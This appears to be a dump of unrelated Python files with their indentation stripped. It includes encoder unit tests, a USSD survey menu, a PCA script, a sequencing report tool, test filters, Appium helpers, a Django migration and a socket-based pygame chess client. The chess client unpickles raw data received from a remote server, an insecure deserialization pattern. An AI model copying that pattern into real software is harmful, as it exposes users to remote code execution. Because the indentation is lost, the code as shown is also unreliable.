df_transformed_correct = pd.DataFrame({'x1':[1,2], 'x2_OHE_a':[1,0], 'x2_OHE_b':[0,1]})
df_transformed = OneHotEncoder().fit_transform(df)
self.compare_DataFrame(df_transformed, df_transformed_correct)
def test_REST_class(self):
"""
output DataFrame should have one encoded column and one encoded REST column
"""
df = pd.DataFrame({'x2':['a','a','b']})
df_transformed_correct = pd.DataFrame({'x2_OHE_a':[1,1,0], 'x2_OHE_REST':[0,0,1]})
df_transformed = OneHotEncoder(number_of_top_values=1).fit_transform(df)
self.compare_DataFrame(df_transformed, df_transformed_correct)
def test_no_REST_class(self):
"""
output DataFrame should not contain a REST class
"""
df = pd.DataFrame({'x2':['a','a','b']})
df_transformed_correct = pd.DataFrame({'x2_OHE_a':[1,1,0], 'x2_OHE_b':[0,0,1]})
df_transformed = OneHotEncoder(number_of_top_values=2).fit_transform(df)
self.compare_DataFrame(df_transformed, df_transformed_correct)
def test_only_one_value(self):
"""
output DataFrame should contain one column with ones
"""
df = pd.DataFrame({'x2':['a','a','a']})
df_transformed_correct = pd.DataFrame({'x2_OHE_a':[1,1,1]})
df_transformed = OneHotEncoder(number_of_top_values=2).fit_transform(df)
self.compare_DataFrame(df_transformed, df_transformed_correct)
def test_ignore_missing(self):
"""
missing value should be put in REST class
"""
df = pd.DataFrame({'x2':['a','a',np.NaN]})
df_transformed_correct = pd.DataFrame({'x2_OHE_a':[1,1,0],'x2_OHE_REST':[0,0,1]})
df_transformed = OneHotEncoder(number_of_top_values=2, dropna=True).fit_transform(df)
self.compare_DataFrame(df_transformed, df_transformed_correct)
def test_encode_missing(self):
"""
missing value should be encoded as own column
"""
df = pd.DataFrame({'x2':['a','a',np.NaN]})
df_transformed_correct = pd.DataFrame({'x2_OHE_a':[1,1,0],'x2_OHE_nan':[0,0,1]})
df_transformed = OneHotEncoder(number_of_top_values=2, dropna=False).fit_transform(df)
self.compare_DataFrame(df_transformed, df_transformed_correct)
def test_encode_missing_as_top_value(self):
"""
missing value should be encoded as own column
"""
df = pd.DataFrame({'x2':['a',np.NaN,np.NaN]})
df_transformed_correct = pd.DataFrame({'x2_OHE_nan':[0,1,1],'x2_OHE_REST':[1,0,0]})
df_transformed = OneHotEncoder(number_of_top_values=1, dropna=False).fit_transform(df)
self.compare_DataFrame(df_transformed, df_transformed_correct)
"""
a column that cointains only missing values is totally unnecessary
"""
#def test_only_ignored_missing_values(self):
#df = pd.DataFrame({'x2':[np.NaN,np.NaN,np.NaN]})
#df_transformed_correct = pd.DataFrame({'x2':[np.NaN,np.NaN,np.NaN]})
#df_transformed = OneHotEncoder(number_of_top_values=1, dropna=False).fit_transform(df)
#self.compare_DataFrame(df_transformed, df_transformed_correct)
#def test_only_used_missing_values(self):
#df = pd.DataFrame({'x2':[np.NaN,np.NaN,np.NaN]})
#df_transformed_correct = pd.DataFrame({'x2_OHE_REST':[1,1,1]})
#df_transformed = OneHotEncoder(number_of_top_values=1, dropna=True).fit_transform(df)
#self.compare_DataFrame(df_transformed, df_transformed_correct)
def test_special_columns_less_values(self):
"""
less columns than top values should be added
"""
df = pd.DataFrame({'x2':['a','a','b']})
df_transformed_correct = pd.DataFrame({'x2_OHE_a':[1,1,0], 'x2_OHE_REST':[0,0,1]})
df_transformed = OneHotEncoder(number_of_top_values=2,special_columns={'x2':1}).fit_transform(df)
self.compare_DataFrame(df_transformed, df_transformed_correct)
def test_special_columns_more_values(self):
"""
more columns than top values should be added
"""
df = pd.DataFrame({'x2':['a','a','b']})
df_transformed_correct = pd.DataFrame({'x2_OHE_a':[1,1,0], 'x2_OHE_b':[0,0,1]})
df_transformed = OneHotEncoder(number_of_top_values=1, special_columns={'x2':2}).fit_transform(df)
self.compare_DataFrame(df_transformed, df_transformed_correct)
def test_binary_encoded_column(self):
"""
result should be one binary encoded column
"""
df = pd.DataFrame({'x2':['a','a','b']})
df_transformed_correct = pd.DataFrame({'x2_a/b':[1,1,0]})
df_transformed = OneHotEncoder(number_of_top_values=2, compress_binary=True).fit_transform(df)
self.compare_DataFrame(df_transformed, df_transformed_correct)
def test_binary_encoded_column_3_values(self):
"""
result should be three columns
"""
df = pd.DataFrame({'x2':['a','a','b',np.NaN]})
df_transformed_correct = pd.DataFrame({'x2_OHE_a':[1,1,0,0], 'x2_OHE_b':[0,0,1,0],'x2_OHE_REST':[0,0,0,1]})
df_transformed = OneHotEncoder(number_of_top_values=2, compress_binary=True, dropna=True).fit_transform(df)
self.compare_DataFrame(df_transformed, df_transformed_correct)
if __name__ == '__main__':
unittest.main() |
from vumi.services.truteq.base import Publisher, Consumer, SessionType
from vumi.services.worker import PubSubWorker
from twisted.python import log
from alexandria.client import Client
from alexandria.sessions.backend import DBBackend
from alexandria.sessions.manager import SessionManager
from alexandria.sessions.db import models
from alexandria.sessions.db.views import _get_data
from alexandria.dsl.core import MenuSystem, prompt, end, case#, sms
from alexandria.dsl.validators import pick_one
"""
Issues that have surfaced when developing this:
1. Vumi does work with different transports but using different
transports in the same menu does not work. For example; sending out an SMS
in a USSD session. The menu items do not have access to the queue and
so cannot publish any message to a consumer.
2. We need a lazy evalation decorator somewhere. Right now I have to pass
callables to make sure that stuff isn't evaluated too soon.
3. Using the session for string substition is useful, but it's implementation
with the explicit `parse=True` is silly.
4. The case((check, response), ...) works great on a lowlevel but is far
too wordy for everyday use.
5. I suspect there should be two types of session storage, one operational
for things like stack counters and one for the application for storing
things like responses to the questions. They should be able to be reset
apart from each other.
6. For a lot of the yield-ing I should probably be looking at something
like eventlet / greenlet / gevent
"""
INDUSTRY_OPTIONS = (
'Marketing',
'Industry',
'Retail',
'Financial/Banking',
'IT/Technology',
'Media',
'Other'
)
EXPECTATIONS_OPTIONS = (
'Meeting my expectations',
'Exceeding my expectations',
'Not meeting my expectations',
)
CONTINUE_OR_QUIT_OPTIONS = (
'Continue',
'End the session'
)
QUIT_MESSAGE = \
'Thanks for taking part. You can view real-time statistics on ' + \
'the Praekelt screens, or by dialing back into the Star menu ' + \
'system!'
def sms(text):
"""
Send an SMS to the current session's MSISDN.
Not working: see comment below
"""
while True:
ms, session = yield
# in it's current form this isn't going to work since
# these items don't have access to the queue and cannot
# publish anything.
class VumiDBClient(Client):
def __init__(self, msisdn, send_ussd_callback, send_sms_callback):
self.id = msisdn
self.session_manager = SessionManager(client=self, backend=DBBackend())
self.session_manager.restore()
self.send_ussd_callback = send_ussd_callback
self.send_sms_callback = send_sms_callback
def send(self, text, end_session=False):
if end_session:
reply_type = SessionType.end
else:
reply_type = SessionType.existing
return self.send_ussd_callback(self.id, text, reply_type)
def send_sms(self, text):
return self.send_sms_callback(self.id, text)
def persist(key, value, *args, **kwargs):
"""
Save a key, value in the session. If value is a callable
then the result of value(*args, **kwargs) will be saved in the session
"""
while True:
ms, session = yield
if callable(value):
session[key] = value()
else:
session[key] = value
yield False, False
def calculate_stats(key, options):
"""
Get the statistics for the given key from the session. Abuses the view
from alexandria to do the database calculation. Sorry, very ugly.
"""
# get data
data = _get_data().get(key, {})
# calculate the total nr of entries
total = float(sum(data.values()))
if total:
# return a list of key: % values
return "\n".join([
"%s: %.0f%%" % (
option,
(data.get(option, 0) / total) * 100
) for option in options
])
else:
return "Not enough data yet"
def returning_user(menu, session):
return session.get('completed', False)
def new_user(*args, **kwargs):
return not returning_user(*args, **kwargs)
def wants_to_quit(menu, session):
# 2. End the session, check if that was answered
return session.pop('continue_or_quit', None) == '2'
class VumiConsumer(Consumer):
"""
Describe the menu system we're running
"""
menu = MenuSystem(
case(
(new_user, prompt('Welcome to the Praekelt Star menu system. ' +\
'What is your first name?', save_as='name')),
(returning_user, prompt('Welcome back %(name)s! Continue to ' +\
'see the real-time statistics.',
parse=True,
options=CONTINUE_OR_QUIT_OPTIONS))
),
case(
(wants_to_quit, end(QUIT_MESSAGE)),
),
persist('industry_stats', calculate_stats, 'industry', INDUSTRY_OPTIONS),
case(
(new_user, prompt('What industry are you from?',
options=INDUSTRY_OPTIONS,
save_as='industry',
validator=pick_one)),
(returning_user, prompt("%(industry_stats)s",
parse=True,
save_as='continue_or_quit',
options=CONTINUE_OR_QUIT_OPTIONS))
),
case(
(wants_to_quit, end(QUIT_MESSAGE)),
),
persist('expectations_stats', calculate_stats, 'expectations', EXPECTATIONS_OPTIONS),
case(
(new_user, prompt('How are you finding the conference?',
options=EXPECTATIONS_OPTIONS,
save_as='expectations',
validator=pick_one)),
(returning_user, prompt("%(expectations_stats)s",
parse=True,
save_as='continue_or_quit',
options=CONTINUE_OR_QUIT_OPTIONS))
),
case(
(wants_to_quit, end(QUIT_MESSAGE)),
),
persist('completed', True),
# sms(
# 'Hi %(name)s want to know more about Vumi and Star menus? ' + \
# 'Visit http://www.praekelt.com'
# ),
end(QUIT_MESSAGE)
)
def new_ussd_session(self, msisdn, message):
client = VumiDBClient(msisdn, self.reply, self.reply_with_sms)
client.answer(str(message), self.menu)
def existing_ussd_session(self, msisdn, message):
client = VumiDBClient(msisdn, self.reply, self.reply_with_sms)
client.answer(str(message), self.menu)
def timed_out_ussd_session(self, msisdn, message):
log.msg('%s timed out, removing client' % msisdn)
client = VumiDBClient(msisdn, self.reply, self.reply_with_sms)
client.deactivate()
def end_ussd_session(self, msisdn, message):
log.msg('%s ended the session, removing client' % msisdn)
client = VumiDBClient(msisdn, self.reply, self.reply_with_sms)
client.deactivate()
def reply_with_sms(self, msisdn, message):
return self.publisher.send({
"type": "sms",
"msisdn": msisdn,
"message": message
})
class VumiUSSDWorker(PubSubWorker):
consumer_class = VumiConsumer
publisher_class = Publisher
|
def potencia(op1,op2):
print("EL resultado de la potencia es: ",op1**op2)
def redondear(numero):
print("EL redonde el numero es: ",round(numero)) |
from sklearn.decomposition import PCA as sklearnPCA
from sklearn.preprocessing import StandardScaler
import pandas as pd
import numpy as np
import json
def create_file_json():
url = "https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data"
#assign colum names to the dataset
names = ['sepal-length', 'sepal-width', 'petal-length', 'petal-width', 'Class']
#read dataset to pandas dataframe
df = pd.read_csv(url, names=names)
X = df.ix[:,0:4].values
y = df.ix[:,4].values
X_std = StandardScaler().fit_transform(X)
sklearn_pca = sklearnPCA(n_components=2)
Y_learn = sklearn_pca.fit_transform(X_std)
matrix_label = np.matrix(y).transpose()
matrix_feature = np.matrix(Y_learn)
matrix_general = np.concatenate((matrix_feature, matrix_label), axis=1)
l = []
for i in range(matrix_general.shape[0]-1):
k=i*3
d = {}
d["x"] = matrix_general.item(k)
d["y"] = matrix_general.item(k+1)
d["label"] = matrix_general.item(k+2)
l.append(d)
with open('static/js/data2.json', 'w') as outfile:
json.dump(l, outfile) |
import pygame
from chess.constants import WIDTH, HEIGHT, CELL_SIZE, BLACK, button_font, RED
from chess.board import Board
from sys import exit
import socket
from threading import Thread
from tkinter import *
from pickle import loads, dumps
pygame.init()
client = None
def click():
global client, e_ip, root
SERVER = e_ip.get()
try:
PORT = 5050
ADDR = (SERVER, PORT)
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(ADDR)
root.destroy()
except:
root.destroy()
exit("Server Error!")
root = Tk()
Label(root, text="IP: ").grid(row=0, column=0)
e_ip = Entry(root, width=50)
e_ip.grid(row=0, column=1)
e_ip.insert(0, socket.gethostbyname(socket.gethostname()))
Button(root, text="Submit", command=click).grid(row=2, column=0)
root.mainloop()
FPS = 60
# Fonts
font = pygame.font.SysFont("comicsans", 20)
WIN = pygame.display.set_mode((WIDTH, HEIGHT))
pygame.display.set_caption("Chess")
clock = pygame.time.Clock()
clock.tick(FPS)
board = None
events = None
msg = None
colour = None
recv_colour = False
recv_start = False
piece = None
def recv_msg():
global client, msg, colour, colour, recv_colour, recv_start, piece
while True:
if not recv_colour:
colour = client.recv(1).decode('utf-8')
recv_colour = True
elif not recv_start:
msg = client.recv(5)
recv_start = True
else:
try:
temp1 = client.recv(28)
temp2 = loads(temp1)
msg = temp2
except:
piece = temp1.decode('utf-8')
def text_objects(text, font, colour, pos):
global WIN
text_surface = font.render(text, True, colour)
text_rect = text_surface.get_rect()
text_rect.center = pos
WIN.blit(text_surface, text_rect)
def button(text, x, y, w, h, colour, active_colour, action=None):
global events
mouse = pygame.mouse.get_pos()
if x + w > mouse[0] > x and y + h > mouse[1] > y:
pygame.draw.rect(WIN, active_colour, (x-4, y-4, w+10, h+10))
for event in events:
if event.type == pygame.MOUSEBUTTONUP and action is not None:
action()
else:
pygame.draw.rect(WIN, colour, (x, y, w, h))
text_objects(text, button_font, BLACK, ((x + (w // 2)), (y + (h // 2))))
def quit_game():
pygame.quit()
exit()
def main():
global WIN, events, board, colour, msg, client, piece
running = True
done = None
board = Board(colour)
r1 = r2 = c2 = c1 = None
while running:
events = pygame.event.get()
for event in events:
if event.type == pygame.QUIT:
running = False
quit_game()
if event.type == pygame.MOUSEBUTTONUP and colour == board.turn:
pos = pygame.mouse.get_pos()
col = pos[0] // CELL_SIZE
row = pos[1] // CELL_SIZE
moves = board.select(row, col)
if board.pawn_promo is not None:
p = board.pawn_promo
p = (p + (" " * (28 - len(p)))).encode('utf-8')
client.send(p)
client.send(dumps(moves))
board.pawn_promo = None
r1 = r2 = c1 = c2 = None
elif len(moves) == 2:
client.send(dumps(moves))
r1 = r2 = c1 = c2 = None
if colour != board.turn and msg is not None:
moves = msg
r1, c1 = moves[0]
r2, c2 = moves[1]
r1 = 7 - r1
r2 = 7 - r2
c1 = 7 - c1
c2 = 7 - c2
if piece is not None:
board.pawn_promo = piece.strip()
board.select(r1, c1, False)
board.select(r2, c2, False)
piece = None
board.pawn_promo = None
else:
board.select(r1, c1)
board.select(r2, c2)
msg = None
if done is None:
done = board.draw(WIN, r1, c1, r2, c2)
elif done == 'cm' or done == 'sm':
running = False
return None
pygame.display.update()
def wait():
global events, WIN, msg, thread, font
running = True
while running:
events = pygame.event.get()
for event in events:
if event.type == pygame.QUIT:
quit_game()
running = False
WIN.fill(BLACK)
text_objects("Waiting for a opponent...", font, RED, (WIDTH//2, HEIGHT//2))
if msg is not None:
msg = None
main()
pygame.display.update()
thread = Thread(target=recv_msg)
thread.start()
wait()
|
from openpyxl import Workbook
import os, sys
import numpy as np
import skbio.alignment, skbio.sequence
from xhtml2pdf import pisa
from .formatting import format_html, format_seq_line
pisa.showLogging()
def prep_excel(sequencing_dir, files, template_seq_name, excel_name='report.xlsx'):
'''
Extract the sequence from each sequencing file and generate a
spreadsheet that matches each sequence with a template sequence and
indicates whether it is a forward or reverse sequence.
Parameters
----------
template_seq: str
The default template sequence to align all query sequences to
template_seq_name: str
The name of the file which contains the template sequence
sequencing_dir: str
The path to the directory which contains all of the sequencing files
excel_name: str
The name of the spreadsheet file to generate
'''
# Make a spreadsheet and add the desired columns
wb = Workbook()
ws = wb.active
ws.append(['Filename', 'Rev?', 'Construct', 'Sequence', 'Template Sequence'])
print("Reading files in {}...\r".format(sequencing_dir))
# Parse the template sequence
if template_seq_name:
with open(template_seq_name) as template_seq_file:
template_seq = template_seq_file.read()
template_seq = template_seq.lower() # Make lower case
template_seq = template_seq.strip() # Remove \n
else:
template_seq = ''
# Add a row for each sequence
for file in files:
filename = os.path.join(sequencing_dir,file)
try:
# Extract the actual sequence and add to spreadsheet
with open(filename) as seq_file:
seq = ''.join([x.strip() for x in seq_file.readlines()])
seq = seq.lower() # Make lower case
seq = seq.strip() # Remove \n
isrev = 'rev' in file
ws.append([file, isrev, template_seq_name or '', seq, template_seq ])
except:
# TODO: generate a custom error instance for this that deletes extra stuff
sys.exit('''Error occured with {}. Make sure there are only sequencing files in the directory.'''.format(filename))
print("Generating {}...\r".format(os.path.join(sequencing_dir, excel_name)))
# Save the file
wb.save(os.path.join(sequencing_dir, excel_name))
return wb
def get_match_str(a,b):
bool_val = np.array(list(a)) == np.array(list(b))
list_val = np.where(bool_val,'|','-')
list_val = list(list_val)
string_val = ''.join(list_val)
return string_val
def gen_aligned_seqs(a):
'''
Generate formatted strings from the alignment object generated
by skbio.sequence.DNA
parameters
----------
a : ??? (skbio.sequence.DNA output)
The alignment object producted by skbio.sequence.DNA
overhangs : int
The number of bases from unaligned regions of the sequence flanking
the alignment to include in the output
'''
# The overhang length could be limited by the positioning of the aligned
# regions within the query and target sequences
start_overhang = min(a.query_begin, a.target_begin)
end_overhang = min(len(a.query_sequence) - 1 - a.query_end,
len(a.target_sequence) - 1 - a.target_end_optimal)
# Get the overhanging strings
query_overhangs = [
a.query_sequence[a.query_begin-start_overhang:a.query_begin],
a.query_sequence[a.query_end+1:a.query_end+end_overhang]
]
target_overhangs = [
a.target_sequence[a.target_begin-start_overhang:a.target_begin],
a.target_sequence[a.target_end_optimal+1:a.target_end_optimal+end_overhang]
]
# Add the overhangs to the aligned sequences
query_sequence_ex = a.aligned_query_sequence.join(query_overhangs)
target_sequence_ex = a.aligned_target_sequence.join(target_overhangs)
#Fully extend sequences into 3' and 5', filling in the shorter ends with '-'
if a.query_begin > a.target_begin:
fragment_to_add = a.query_sequence[0:a.query_begin-start_overhang]
query_sequence_ex = fragment_to_add + query_sequence_ex
target_sequence_ex = len(fragment_to_add) * '-' + target_sequence_ex
if a.query_begin < a.target_begin:
fragment_to_add = a.target_sequence[0:a.target_begin-start_overhang]
target_sequence_ex = a.target_sequence[0:a.target_begin-start_overhang] + target_sequence_ex
query_sequence_ex = len(fragment_to_add) * '-' + query_sequence_ex
if len(a.query_sequence) - 1 - a.query_end > len(a.target_sequence) - 1 - a.target_end_optimal:
fragment_to_add = a.query_sequence[len(a.query_sequence) - 1 - a.query_end:len(a.query_sequence) - 1]
query_sequence_ex += fragment_to_add
target_sequence_ex += len(fragment_to_add) * '-'
if len(a.query_sequence) - 1 - a.query_end < len(a.target_sequence) - 1 - a.target_end_optimal:
fragment_to_add = a.target_sequence[len(a.target_sequence) - 1 - a.target_end_optimal:len(a.target_sequence) - 1]
target_sequence_ex += fragment_to_add
query_sequence_ex += len(fragment_to_add) * '-'
# Generate the match string
match_str = get_match_str(query_sequence_ex, target_sequence_ex)
return query_sequence_ex, target_sequence_ex, match_str
def gen_reports(sequencing_dir, wb, line_length=100):
'''
Take an excel spreadsheet containing alignment inputs, generate the alignments,
and produce a .pdf file for each alignment
parameters
----------
sequencing_dir : str
The path to the directory which contains all of the sequencing files
wb : ??? (openpyxl workbook object)
openpyxl object of the spreadsheet which contains the alignment input data
line_length : int
The number of characters per each line in the formatted alignment
'''
# Make the reports directory
report_dirname = os.path.join(sequencing_dir, 'reports')
print('Generating {}.'.format(report_dirname))
os.mkdir(report_dirname)
# Get rows and column labels from the spreadsheet
ws = wb.get_active_sheet()
rows = list(ws.rows)
header = list(map(lambda x: x.value, rows.pop(0)))
# Make a custom substition matrix to allow alignments of sequences with 'N' nucleotides
mtrx = skbio.alignment.make_identity_substitution_matrix(1, -2, alphabet='ACGTN')
# Iterate through the rows
for row in rows:
# Make row into a dict with column name as the index
row_vals = map(lambda x: x.value, row)
row_dict = dict(zip(header,row_vals))
# Convert to reverse complement if reverse sequence
if row_dict['Rev?']:
sequence = skbio.sequence.DNA(row_dict['Sequence'].strip(),lowercase=True).reverse_complement()
row_dict['Sequence'] = str(sequence)
# Generate alignment
print("Aligning {} to {}\r".format(row_dict['Filename'], row_dict['Construct']))
a = skbio.alignment.StripedSmithWaterman(row_dict['Sequence'].lower())(row_dict['Template Sequence'].lower())
# Get the sequence position where the alignment starts
query_begin = a.query_begin
target_begin = a.target_begin
# format alignment
query_sequence, target_sequence, match_str = gen_aligned_seqs(a)
# Initialize formatted alignment string
seq = ''
# Split the alignment up into fragments according to line_length and format
for i in range(len(query_sequence) // line_length + 1):
a = query_sequence[0+i*line_length:line_length+i*line_length]
b = target_sequence[0+i*line_length:line_length+i*line_length]
match = match_str[0+i*line_length:line_length+i*line_length]
# Determine the actually sequence length covered by the line
a_length = len(a) - a.count('-')
b_length = len(b) - b.count('-')
# Format
seq += format_seq_line(a, b, match,
(query_begin, query_begin+a_length-1),
(target_begin, target_begin+b_length-1))
# Increment length
query_begin += a_length
target_begin += b_length
# Prepare into html file
html = format_html(row_dict['Filename'], row_dict['Construct'], seq)
# Generate .pdf file
basename = row_dict['Filename'].split('.')[0]
report_filename = os.path.join(report_dirname, '{}.pdf'.format(basename))
with open(report_filename, "w+b") as reportFile:
# convert HTML to PDF
pisaStatus = pisa.CreatePDF(
html,
dest=reportFile) |
__author__ = 'pablo'
data = []
with open('chalearn_full_db.csv', 'r') as f:
lines = f.readlines()
for l in lines:
name, real, age, _ = l.split(',')
data.append([name, age, '-1'])
with open('fgnet.csv', 'r') as f:
lines = f.readlines()
for l in lines:
age, ind, name, _ = l.split(',')
data.append([name, age, ind])
with open('fgnet_chalearn_apparent_db.csv', 'w') as f:
for img in data:
f.write(','.join(img) + '\n') |
# Copyright 2022 The Cobalt Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Starboard Linux Platform Test Filters."""
import os
from starboard.tools import paths
from starboard.tools.testing import test_filter
# pylint: disable=line-too-long
_MODULAR_BUILD_FILTERED_TESTS = {
'nplb': [
'MultiplePlayerTests/*/*sintel_329_ec3_dmp*',
'MultiplePlayerTests/*/*sintel_381_ac3_dmp*',
'SbPlayerWriteSampleTests/SbPlayerWriteSampleTest.WriteSingleBatch/audio_sintel_329_ec3_dmp_*',
'SbPlayerWriteSampleTests/SbPlayerWriteSampleTest.WriteSingleBatch/audio_sintel_381_ac3_dmp_*',
'SbPlayerWriteSampleTests/SbPlayerWriteSampleTest.WriteMultipleBatches/audio_sintel_329_ec3_dmp_*',
'SbPlayerWriteSampleTests/SbPlayerWriteSampleTest.WriteMultipleBatches/audio_sintel_381_ac3_dmp_*',
'SbSocketAddressTypes/SbSocketGetInterfaceAddressTest.SunnyDayDestination/type_ipv6',
'SbSocketAddressTypes/SbSocketGetInterfaceAddressTest.SunnyDaySourceForDestination/type_ipv6',
'SbSocketAddressTypes/SbSocketGetInterfaceAddressTest.SunnyDaySourceNotLoopback/type_ipv6',
],
'player_filter_tests': [test_filter.FILTER_ALL],
}
_FILTERED_TESTS = {
'nplb': [
# TODO(b/286249595): This test crashes when coverage is enabled.
'SbMemoryMapTest.CanChangeMemoryProtection'
],
}
if os.getenv('MODULAR_BUILD', '0') == '1':
_FILTERED_TESTS = _MODULAR_BUILD_FILTERED_TESTS
# Conditionally disables tests that require ipv6
if os.getenv('IPV6_AVAILABLE', '1') == '0':
_FILTERED_TESTS['nplb'].extend([
'SbSocketAddressTypes/SbSocketGetInterfaceAddressTest.SunnyDayDestination/type_ipv6',
'SbSocketAddressTypes/SbSocketGetInterfaceAddressTest.SunnyDaySourceForDestination/type_ipv6',
'SbSocketAddressTypes/SbSocketGetInterfaceAddressTest.SunnyDaySourceNotLoopback/type_ipv6',
'SbSocketAddressTypes/SbSocketBindTest.RainyDayBadInterface/type_ipv6_filter_ipv6',
'SbSocketAddressTypes/PairSbSocketGetLocalAddressTest.SunnyDayConnected/type_ipv6_type_ipv6',
'SbSocketAddressTypes/PairSbSocketIsConnectedAndIdleTest.SunnyDay/type_ipv6_type_ipv6',
'SbSocketAddressTypes/PairSbSocketIsConnectedTest.SunnyDay/type_ipv6_type_ipv6',
'SbSocketAddressTypes/PairSbSocketReceiveFromTest.SunnyDay/type_ipv6_type_ipv6',
'SbSocketAddressTypes/SbSocketResolveTest.Localhost/filter_ipv6_type_ipv6',
'SbSocketAddressTypes/SbSocketResolveTest.SunnyDayFiltered/filter_ipv6_type_ipv6',
'SbSocketAddressTypes/PairSbSocketSendToTest.RainyDaySendToClosedSocket/type_ipv6_type_ipv6',
'SbSocketAddressTypes/PairSbSocketSendToTest.RainyDaySendToSocketUntilBlocking/type_ipv6_type_ipv6',
'SbSocketAddressTypes/PairSbSocketSendToTest.RainyDaySendToSocketConnectionReset/type_ipv6_type_ipv6',
'SbSocketAddressTypes/PairSbSocketWaiterWaitTest.SunnyDay/type_ipv6_type_ipv6',
'SbSocketAddressTypes/PairSbSocketWaiterWaitTest.SunnyDayAlreadyReady/type_ipv6_type_ipv6',
'SbSocketAddressTypes/PairSbSocketWaiterWaitTimedTest.SunnyDay/type_ipv6_type_ipv6',
'SbSocketAddressTypes/PairSbSocketWrapperTest.SunnyDay/type_ipv6_type_ipv6',
])
# pylint: enable=line-too-long
class TestFilters(object):
"""Starboard Linux platform test filters."""
def GetTestFilters(self):
filters = []
has_cdm = os.path.isfile(
os.path.join(paths.REPOSITORY_ROOT, 'third_party', 'internal', 'ce_cdm',
'cdm', 'include', 'cdm.h'))
for target, tests in _FILTERED_TESTS.items():
filters.extend(test_filter.TestFilter(target, test) for test in tests)
if has_cdm:
return filters
# Filter the drm related tests, as ce_cdm is not present.
for target, tests in self._DRM_RELATED_TESTS.items():
filters.extend(test_filter.TestFilter(target, test) for test in tests)
return filters
_DRM_RELATED_TESTS = {
'nplb': [
'SbDrmTest.AnySupportedKeySystems',
'SbMediaCanPlayMimeAndKeySystem.AnySupportedKeySystems',
],
}
def CreateTestFilters():
return TestFilters()
|
class Cell:
"""Contains all information and methods regarding the cells"""
def __init__(self):
"""Sets up the initial variables"""
self.cell_history = [[False, 0]] # The total history of the cell
def is_alive(self):
"""Return whether the cell is alive or not"""
return self.cell_history[-1][0]
def length_of_state(self):
"""Return how long the cell has been in its current state"""
return self.cell_history[-1][1]
def wipe_history(self):
"""Remove the filler history and the age of the states"""
self.cell_history = [[False, 0], [True, 0]] if self.cell_history[-1] == [True, 0] else [[False, 0]]
def increment_history(self):
"""Adds one generation to the current history without changing"""
self.update_history(False)
def update_history(self, change):
"""Updating the history of the cell depending on whether they need to change or not"""
if change: # If the cell needs to change
self.cell_history.append([False, 0] if self.is_alive() else [True, 0]) # Change cell state in history
else:
self.cell_history[-1][1] += 1 # Increase the generation count for the current cell state
def converted_data(self):
"""Return the cell data in condensed text format"""
old = True if self.length_of_state() != 0 else False # Whether the cell has maintained a state or is new
return '{}'.format(('+' if old else '=') if self.is_alive() else ('-' if old else '.')) # The age and state
|
#!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .mobilecommand import MobileCommand as Command
from selenium.webdriver.common.by import By
from selenium.webdriver.remote.webelement import WebElement as SeleniumWebElement
class WebElement(SeleniumWebElement):
def find_element_by_ios_uiautomation(self, uia_string):
"""Finds an element by uiautomation in iOS.
:Args:
- uia_string - The element name in the iOS UIAutomation library
:Usage:
driver.find_element_by_ios_uiautomation('.elements()[1].cells()[2]')
"""
return self.find_element(by=By.IOS_UIAUTOMATION, value=uia_string)
def find_elements_by_ios_uiautomation(self, uia_string):
"""Finds elements by uiautomation in iOS.
:Args:
- uia_string - The element name in the iOS UIAutomation library
:Usage:
driver.find_elements_by_ios_uiautomation('.elements()[1].cells()[2]')
"""
return self.find_elements(by=By.IOS_UIAUTOMATION, value=uia_string)
def find_element_by_android_uiautomator(self, uia_string):
"""Finds element by uiautomator in Android.
:Args:
- uia_string - The element name in the Android UIAutomator library
:Usage:
driver.find_element_by_android_uiautomator('.elements()[1].cells()[2]')
"""
return self.find_element(by=By.ANDROID_UIAUTOMATOR, value=uia_string)
def find_elements_by_android_uiautomator(self, uia_string):
"""Finds elements by uiautomator in Android.
:Args:
- uia_string - The element name in the Android UIAutomator library
:Usage:
driver.find_elements_by_android_uiautomator('.elements()[1].cells()[2]')
"""
return self.find_elements(by=By.ANDROID_UIAUTOMATOR, value=uia_string)
def find_element_by_accessibility_id(self, id):
"""Finds an element by accessibility id.
:Args:
- id - a string corresponding to a recursive element search using the
Id/Name that the native Accessibility options utilize
:Usage:
driver.find_element_by_accessibility_id()
"""
return self.find_element(by=By.ACCESSIBILITY_ID, value=id)
def find_elements_by_accessibility_id(self, id):
"""Finds elements by accessibility id.
:Args:
- id - a string corresponding to a recursive element search using the
Id/Name that the native Accessibility options utilize
:Usage:
driver.find_elements_by_accessibility_id()
"""
return self.find_elements(by=By.ACCESSIBILITY_ID, value=id)
def set_text(self, keys=''):
"""Sends text to the element. Previous text is removed.
Android only.
:Args:
- keys - the text to be sent to the element.
:Usage:
element.set_text('some text')
"""
data = {
'elementId': self._id,
'value': [keys]
}
self._execute(Command.REPLACE_KEYS, data)
return self
@property
def location_in_view(self):
"""Gets the location of an element relative to the view.
:Usage:
location = element.location_in_view
"""
return self._execute(Command.LOCATION_IN_VIEW)['value']
def set_value(self, value):
"""Set the value on this element in the application
"""
data = {
'elementId': self.id,
'value': [value],
}
self._execute(Command.SET_IMMEDIATE_VALUE, data)
return self
|
# Generated by Django 3.0.5 on 2020-04-22 00:28
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [("data", "0001_initial")]
operations = [
migrations.RemoveField(
model_name="organizationidentifier", name="organization"
),
migrations.RemoveField(model_name="organizationname", name="organization"),
migrations.RemoveField(model_name="postcontactdetail", name="post"),
migrations.RemoveField(model_name="postlink", name="post"),
migrations.DeleteModel(name="OrganizationContactDetail"),
migrations.DeleteModel(name="OrganizationIdentifier"),
migrations.DeleteModel(name="OrganizationName"),
migrations.DeleteModel(name="PostContactDetail"),
migrations.DeleteModel(name="PostLink"),
]
|
def giveParts(number):
